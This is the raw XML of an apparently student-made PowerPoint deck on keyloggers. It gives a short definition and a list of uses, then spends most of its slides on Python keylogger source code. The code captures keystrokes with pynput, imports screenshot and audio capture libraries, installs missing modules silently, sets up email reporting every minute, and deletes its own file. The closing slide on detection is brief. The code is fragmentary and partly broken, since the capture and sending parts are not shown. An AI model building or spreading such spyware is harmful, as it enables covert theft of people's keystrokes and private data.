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1AD4-D92A-EB33-8887-E92AC7725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D8B0A-1084-F401-B251-C5FFD8D8E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02CB1-DBE0-4C2C-D891-61174DCA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FD23-F3AA-4E8B-BDF0-0DDFB8F87B7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E659-5D0B-359A-CF37-78037450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FC49-507F-2DD7-A99F-B9294CA0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FE2-2749-4800-BDC1-46B5CB3C8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6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9C8D-0830-DF52-90C8-7C4DDB21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7593B-8562-AE0D-AFE7-B98F49BE3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B856-B090-9556-49A4-6565C2BC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FD23-F3AA-4E8B-BDF0-0DDFB8F87B7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C481D-E880-32B2-24D2-818BEB75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9FC3D-3B7C-1526-2842-1577F8DD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FE2-2749-4800-BDC1-46B5CB3C8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96CA2-E492-4E67-11C9-7500E82B4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289AE-E70F-E80D-7D35-0452DB932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992CC-F921-56B7-6D59-DFB70AA9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FD23-F3AA-4E8B-BDF0-0DDFB8F87B7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3D0D-46E9-056A-0589-E719B1C6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81CB-9AEC-C27C-F6D6-D5B70974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FE2-2749-4800-BDC1-46B5CB3C8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6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FBE-051A-B294-268B-255786CF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6837-CB4D-8E66-3127-E9DDDE63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1B84-1DEC-B41B-C02F-4406FA64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FD23-F3AA-4E8B-BDF0-0DDFB8F87B7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4892-A88B-01F8-D7BC-EF4E4F9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F6A6-C4AD-E372-FE25-CD086752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FE2-2749-4800-BDC1-46B5CB3C8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6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5667-FF31-B9DE-9397-8044876B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83FEB-11A3-4471-39A0-0AA60625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B91D-B318-B0DD-9BB5-5ACE7EA0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FD23-F3AA-4E8B-BDF0-0DDFB8F87B7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F65E-D33E-EC93-D2CE-1CE5A435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E66C-0D4D-6296-55C2-B91E7E5B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FE2-2749-4800-BDC1-46B5CB3C8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4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ACE8-DF35-4078-B71A-BBF61D3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D781-CC94-82A0-AF32-50CA5E087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FC2AA-3CDD-3A03-9190-46377B6B3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59E8-629E-B9DE-46D7-0BC9EAAF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FD23-F3AA-4E8B-BDF0-0DDFB8F87B7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D768C-34D6-DAA4-B300-5DD6F439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C02B9-62FC-A0C1-0D6B-D4510A5D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FE2-2749-4800-BDC1-46B5CB3C8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D78D-7323-DD49-8E6E-470B1243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5A74-1C04-512F-CFE5-52A56AE2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217FC-C9AC-06A6-3084-09350F31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1D4FC-4696-79EF-915D-EB4E799CA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1848A-F2D7-BDF9-733D-26C0015C2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5B304-1142-56B9-5BD6-B1FA6A9A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FD23-F3AA-4E8B-BDF0-0DDFB8F87B7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8157-36E5-02CF-67C0-9EEBA725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9AE0C-DE59-054E-8FE0-DF3271D8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FE2-2749-4800-BDC1-46B5CB3C8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3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E914-D32E-B094-70BC-7D540067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3C5F1-A46E-0FC2-7705-EB6E47EE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FD23-F3AA-4E8B-BDF0-0DDFB8F87B7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AC69A-6187-3E6B-071D-1BF61B29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1EE1C-E28D-01F4-6583-4D148574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FE2-2749-4800-BDC1-46B5CB3C8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2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426D3-2C51-6188-7F43-5CB0EB67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FD23-F3AA-4E8B-BDF0-0DDFB8F87B7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9FDEF-C00E-DAA2-360E-E09154EF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92EF4-76F1-8B5A-CEF6-01B5BA8D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FE2-2749-4800-BDC1-46B5CB3C8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D461-1F99-2543-B720-8498A703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49FF-815B-292A-362D-563E46CA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2E7E1-7FEC-B98C-D433-8062E3619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7BDAA-4E2A-3971-D6C5-22AE0CCE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FD23-F3AA-4E8B-BDF0-0DDFB8F87B7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F0902-8D93-A7DA-587E-FA43B4E0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078D-BCAA-0470-AAD4-7AADBDC9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FE2-2749-4800-BDC1-46B5CB3C8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98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0983-1FEA-DFD8-EF90-09D3ED9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AAAC2-F103-368E-EBBA-0086765EB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360B3-8AD8-2D6B-1B05-7913AE554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3BE7F-001D-B83E-F9E1-B9563515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FD23-F3AA-4E8B-BDF0-0DDFB8F87B7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FA597-E346-C937-0A25-DE56F979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942EC-ED22-137A-11EF-92CBADCE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FE2-2749-4800-BDC1-46B5CB3C8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1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FA17A-6B78-8F7A-F3B1-98B5FF84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1129F-5634-D613-411D-B0A015B6C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4716-97BE-FDC8-9AD4-D36E4FF54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5FD23-F3AA-4E8B-BDF0-0DDFB8F87B7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9F03-33DE-7450-5887-084F9F24D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2FB1E-6D5A-B600-7B6E-ABC67CE58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2FE2-2749-4800-BDC1-46B5CB3C8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8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8761-3F03-92A8-9FCB-661B1AEA7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7" y="1440870"/>
            <a:ext cx="9144000" cy="1551711"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Keylogger</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4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FBF02-3225-DCA6-F1B4-25CBEB3D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91" y="3602038"/>
            <a:ext cx="10543309" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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29435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12E3-0A6B-284E-C94B-88BC6D0D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7B9A-1A64-857E-B30E-F062EE6D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1.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keylogger, sometimes called a keystroke logger,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type of surveillance technology used to monitor and record each keystroke on a specific device, such as a computer or smartphone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It can be either hardware- or software-based. The latter type is also known as system monitoring software or keyboard capture software.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2.A keylogger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form of malware or hardware that keeps track of and records your keystrokes as you type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It takes the information and sends it to a hacker using a command-and-control (C&amp;C)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27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D7F6-2BE0-9728-1AD1-3FEC96819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91346" y="-941963"/>
            <a:ext cx="10030691" cy="2387600"/>
          </a:xfrm>
        </p:spPr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54B88-9E83-6598-CF3A-7195565C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86" y="1758609"/>
            <a:ext cx="9535886" cy="43445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Record keystroke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record any websites visited as well as snapshots of the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Logs around instant messages and emails sent or received.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Applications opened by the user in a certain period of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By employers to observe employees' computer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By parents to supervise their children's internet usage.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By device owners to track possible unauthorized activity on their devices.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98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C489-6343-4175-39A4-D4A673C55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9257" y="914401"/>
            <a:ext cx="5529943" cy="685800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Sourse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t> code 1: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C631E6-9FBC-AA9D-51CF-971FCAF76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8" y="1600201"/>
            <a:ext cx="7503886" cy="5148941"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>try:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>    import logging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>    import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>os</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>    import platform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>    import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>smtplib</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>    import socket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>    import threading</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>    import wave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>    import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>pyscreenshot</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>    import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>sounddevice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>sd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375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AD74-7EF2-FCC9-1E9C-3D120550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138546"/>
            <a:ext cx="10515600" cy="22658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62E15-90ED-E1B0-5305-58A4D59D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7199456"/>
          </a:xfrm>
        </p:spPr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pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> import keyboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>pynput.keyboard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> import Listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    from email import encoders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>email.mime.base</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>MIMEBase</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>email.mime.multipart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>MIMEMultipart</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>email.mime.text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>MIMEText</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    import glob</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>except </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>ModuleNotFoundError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    from subprocess import call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    modules = ["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>pyscreenshot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>","</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>sounddevice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>","</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>"]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    call("pip install " + ' '.join(modules), shell=True)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52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BFFB-6A9B-5850-ADEE-22AC807E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57FE-35C7-770B-DE6A-37ACCD5E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finally:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    EMAIL_ADDRESS = "YOUR_USERNAME"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    EMAIL_PASSWORD = "YOUR_PASSWORD"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    SEND_REPORT_EVERY = 60 # as in seconds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86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D9AA-41E0-ED18-C60A-C284B717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1" y="325439"/>
            <a:ext cx="4696691" cy="921470"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>Sourse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> code 2: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45E76-4114-5C11-9BDA-5BEB5BFB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48691"/>
            <a:ext cx="9324109" cy="5334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t> class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>KeyLogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>        def __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>__(self, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>time_interval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>, email, password):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>self.interval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>time_interval</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>            self.log = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>KeyLogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t> Started..."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>self.email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t> = email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>self.password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t> = password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>        def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>appendlog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>(self, string):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>            self.log = self.log + string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="28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70042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DA86-9512-A794-B16B-052C7C1EC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3564" y="-1842510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ED904-6ABD-7CBE-82AE-9E5739AB9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81892" y="318654"/>
            <a:ext cx="11319164" cy="5278582"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t> else:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>                try:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>os.path.abspath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>os.getcwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>())</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>os.system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>("cd " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>os.system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>pkill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>leafpad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>os.system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>chattr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t> " +  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>os.path.basename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>(__file__))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>                    print('File was closed.')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>os.system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>("rm -rf" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>os.path.basename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>(__file__))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>                except </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>OSError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>                    print('File is close.’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>keylogger = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>KeyLogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>(SEND_REPORT_EVERY, EMAIL_ADDRESS, EMAIL_PASSWORD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0" err="1"/>
              <a:t>keylogger.run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>()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8750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E153-6D40-3C02-1189-5314426C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31FB-0F89-93B1-C3C3-DC44A58B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Keyloggers are a potent threat to both individuals and enterprises, with the potential to cause significant harm if left undetected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Understanding the nature of keyloggers, their methods of infiltration, and the dangers they pose is crucial for maintaining a secure digital environment.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Keylogging hardware can usually be removed by unplugging or removing the physical device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The good news is that there are ways to tell if there's a keylogger on your computer — in fact, some of the best free antivirus software options can function as anti-keylogger software too.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96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Office Theme</vt:lpstr>
      <vt:lpstr>Keylogger</vt:lpstr>
      <vt:lpstr>Introduction:</vt:lpstr>
      <vt:lpstr>Features:</vt:lpstr>
      <vt:lpstr>Sourse code 1:</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Sourse code 2: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ELCOT</dc:creator>
  <cp:lastModifiedBy>ELCOT</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-03-24T14:02:29Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-24T14:02:42Z</dcterms:modified>
</cp:coreProperties>
</file>